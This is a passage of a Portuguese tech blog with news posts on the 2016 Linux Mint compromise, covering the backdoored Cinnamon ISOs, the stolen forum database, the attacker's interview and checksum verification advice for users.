Até o sempre polêmico Edward Snowden comentou sobre o assunto em seu perfil no Twitter reprovando a atitude do FBI.

_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Fórum do Linux MInt foi hackeado a um mês atrás e ninguém sabia!

Nenhum comentário

quarta-feira, 24 de fevereiro de 2016

Mais uma capítulo para a novela do Linux Mint. Um golpe difícil de absorver para a reputação do sistema, mas efetivamente, o fórum do Linux Mint foi comprometido há muito mais tempo do que as pessoas imaginavam.

Linux Mint Hack




Se você acompanhou os posts do blog Diolinux nesta semana deve ter ficado sabendo destes infelizes acontecimentos. O site do Linux Mint foi invadido, assim como seu fórum, o ataque consistiu em trocar as ISOs originais do sistema operacional por versões com um backdoor incluso, o que afetou algumas centenas de pessoas que fizeram o download do sistema no dia 20. Igualmente preocupante foi a invasão ao fórum da distro onde mais de 70 mil contas foram afetadas.

Ontem publicamos aqui uma matéria a respeito do hacker responsável pelo acontecido que identificou-se através do nick name "Peace", ele informou na entrevista feita pelo ZDNET que havia invadido no fórum do Linux Mint ainda Janeiro.

Aparentemente, em 16 de Janeiro o fórum do Linux Mint já estava sendo vendido na internet por algumas bitcoins. Isso agrava um pouco a situação pois isso significa que o fórum estava vulnerável há mais de um mês sem que ninguém do Mint percebesse, ou pelo menos se pronunciasse à respeito do assunto.

Deixando claro...


Essa falha de segurança no site do Linux Mint fez com que muitas pessoas colocassem em dúvida a segurança do Linux, especialmente o Mint (obviamente). Vale ressaltar que o sistema não foi infectado e o sistema operacional Linux Mint continua tão seguro quanto sempre foi.

O problema foi no servidor do site, que segundo o Netcraft rodava Debian até então e à partir do dia 23 roda Ubuntu. E isso não quer dizer que Debian/Ubuntu ou mesmo Mint são inseguros, isso simplesmente quer dizer que a pessoa responsável por instalar/configurar/manter o servidor do site não foi competente o suficiente para executar as suas tarefas com maestria.

Ainda vou fazer um vídeo para falarmos sobre o assunto, mas acredito ainda na integridade do sistema, erros acontecem e infelizmente as vezes eles tem consequências maiores, o que aconteceu com o Mint poderia ter acontecido com qualquer outro site que tenha vulnerabilidades a serem exploradas. 

O que você pensa sobre o assunto?
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Hacker explica como adulterou as ISOs do Linux Mint

Nenhum comentário

terça-feira, 23 de fevereiro de 2016

Um hacker conhecido por "Peace" foi o responsável pela invasão ao site do Linux Mint e ao fórum da distribuição também, ele contou a ZDNET quais foram as suas intenções com o feito e explicou superficialmente como fez para distribuir algumas centenas de ISOs com um backdoor incluso.

Hacker explica como invadiu site do Linux Mint




Através de alguns tweets o hacker que foi responsável pela invasão ao site do Linux Mint comentou sobre o seu feito, chamado pelo nome de "Peace", ele não informou mais detalhes sobre si mesmo (algo esperado, naturalmente), mas comentou sobre como explorou a vulnerabilidade no site da distro.

Se você não está por dentro do acontecido, leia a nossa matéria sobre o assunto.  A notícia pegou os usuários e fãs do Linux Mint de surpresa e nem poderia ser diferente. Por conta disso o site do Linux Mint está offline para manutenção.

Segundo as informações o hacker responsável revelou que conseguiu controlar algumas centenas de instalações do Linux Mint por conta da modificação das ISOs. Além das imagens de instalação do Mint, "Peace" disse que roubou uma cópia inteira do Fórum do Linux Mint duas vezes, uma no dia 28 de Janeiro e outra no dia 18 de Fevereiro, dois dias antes do pessoal do Mint anunciar o problema.

Juntamente com as informações do fórum, estão identificações pessoais dos usuários, como e-mails, senhas utilizadas no fórum, links para redes sociais que as pessoas tenham associadas ao seus perfis, etc. Peace estava vendendo o fórum do Linux Mint por 0,197 bitcoins, algo em torno de US$ 85,00. 

Estima-se que cerca de 71 mil contas foram hackeadas com a ação no site.

Como dissemos anteriormente, Peace não quis revelar mais informações sobre si mesmo, mas informou que trabalha sozinho(a) e que viveu na Europa, não tendo nenhuma filiação com algum grupo hacker.

Através da entrevista feita pelo ZDNET, Peace explicou como conseguiu acesso ao site do Mint, "fui apenas bisbilhotando", comentou, quando em Janeiro encontrou uma vulnerabilidade que concedia o acesso não autorizado, "eu tinha as credenciais para fazer login no painel de administração do site como Lefebvre (criador do Mint)", Peace negou-se a dar mais informações sobre o processo que o fez ter este acesso.

No sábado passado Peace decidiu substituir as ISOs do Linux Mint Cinnamon de 64 bits por uma versão modificada no sistema que incluía o backdoor "Tsunami". Pelo que o hacker comentou ele não tinha nenhum objetivo específico para ação, mas a principal motivação da inserção do backdoor era a de construir uma botnet. O malware "Tsunami" utilizado funciona da seguinte forma; depois de implantado, através do backdoor ele conecta-se silenciosamente a um servidor IRC onde ele  aguarda por comandos.

O "Tsunami" é comumente utilizado para criar uma rede de computadores zumbis para derrubar algum site enviando "um tsunami" de acessos ao mesmo (daí o nome). O "Tsunami" é um bot simples  que pode ser configurado manualmente e que conversa com um servidor de IRC por um canal definido, com uma senha definida pelo seu criador. Apesar de ser utilizado normalmente para derrubar sites com máquinas escravas ele pode permitir também que o atacante execute comandos que permitiriam o download de outros malwares para serem utilizados de outra forma.

Como foi comentado, o ataque não teve um motivo específico, pelo que Peace comentou foi algo como"eu acessei porque podia", mas disse que não descartava a hipótese de usar os botnets para "mineração de bitcoins ou outras coisas."

_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Linux Mint é vítima de ataques, seu sistema pode estar infectado!

Nenhum comentário

segunda-feira, 22 de fevereiro de 2016

Uma notícia preocupante para todos os usuários e fãs do Linux Mint, o site da distribuição Linux comumente reconhecida por ser uma porta de entrada para os sistemas baseados em Linux no Desktop foi invadido e isso pode ter afetado usuários do sistema.

Linux Mint é vítima de ataques



Apesar do problema ter ocorrido há dois dias atrás eu me senti na obrigação de comentar o assunto por dois motivos. A primeira coisa é que vi muita gente confundindo as coisas e achando que o Linux Mint estava vulnerável e a outra é que é uma coisa realmente importante e serve de exemplo para que as outras distribuições ou projetos tomem medidas preventivas.


O que aconteceu?


Acho que a primeira coisa é explicar o que realmente aconteceu. Segundo o blog do Linux Mint o site da distro foi invadido por hackers - saiba mais sobre os tipos de hacker - que modificaram as ISOs do Linux Mint que as pessoas baixam incluindo nas mesmas um trojan chamado "Tsunami".

Aparentemente só as ISOs do Linux Mint com versão Cinnamon foram afetadas, no blog do Mint eles comentam que se você baixou o arquivo entre o dia 19 e 21 por torrent provavelmente você não teve problemas. Se você a conseguiu de outra forma é importante que você fique atento e verifique se a sua ISO não foi comprometida.

O pessoal do Linux Mint disponibilizou o MD5 das ISOs para comparação:

6e7f7e03500747c6c3bfece2c9c8394f       linuxmint-17.3-cinnamon-32bit.iso e71a2aad8b58605e906dbea444dc4983     linuxmint-17.3-cinnamon-64bit.iso 30fef1aa1134c5f3778c77c4417f7238       linuxmint-17.3-cinnamon-nocodecs-32bit.iso 3406350a87c201cdca0927b1bc7c2ccd     linuxmint-17.3-cinnamon-nocodecs-64bit.iso df38af96e99726bb0a1ef3e5cd47563d      linuxmint-17.3-cinnamon-oem-64bit.iso  

Entretanto, se você ainda assim não se sente seguro é importante que você logue-se em seu computador desconectado da internet, faça backup dos seus dados e formate o computador novamente com uma nova ISO.


Problemas com o fórum do Mint


Não bastasse o problema com a adulteração das ISOs do Linux Mint o fórum oficial da distro também foi afetado e a integridade dos dados dos usuários comprometida. Tanto que os hackers responsáveis pelo ataque estavam vendendo  as informações do banco de dados da distro:

Linux Mint

O pessoal do Linux Mint pediu para quem participa do fórum que mude as suas senhas o quanto antes e modifique as senhas de todos os serviços que eventualmente as pessoas tenha ligado ao seu perfil no fórum, como as redes sociais particulares.

O Linux Mint é vulnerável?


Essa é uma desambiguação necessária de ser feita, muitas pessoas estão pensando que o Linux Mint está afetado pelo ocorrido, mas o fato é que a ISO foi modificada, o sistema não foi infectado depois da instalação, a manobra hacker modificou as ISOs antes mesmo de serem baixadas, então na verdade o problema de segurança foi no site (aparentemente no Wordpress pelo que foi falado) e não no Linux Mint (Sistema Operacional).

Apenas fique atento(a), se você baixo uma ISO do Linux Mint nos últimos dias, por segurança, considere baixar o sistema novamente através de um método mais seguro.

Aparentemente os ataques vieram da Bulgária.

O motivo do ataque?


O motivo do ataque ainda não está claro, mas assim que tivermos novidades você ficará sabendo. Vale a pena aproveitar este momento para ressaltar o quanto é importante um profissional que cuide da integridade dos sites, como o Mint é comumente utilizado por leigos em informática me parece algo natural atacá-lo, porém, como é complicado invadir qualquer sistema Linux instalado, a solução foi adulterar a própria ISO de instalação.

Se o sistema foi atacado porque ele é utilizado por leigos, se foi atacado porque as pessoas não gostavam do Linux Mint por algum motivo ou se foi atacado simplesmente para mostrar "que era possível", nós não sabemos, mas vale o alerta para todas as distros que continuar fazendo uma revisão constante em seus sites, procurando por eventuais brechas de segurança.
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Blog Diolinux © all rights reserved
made with by templateszoo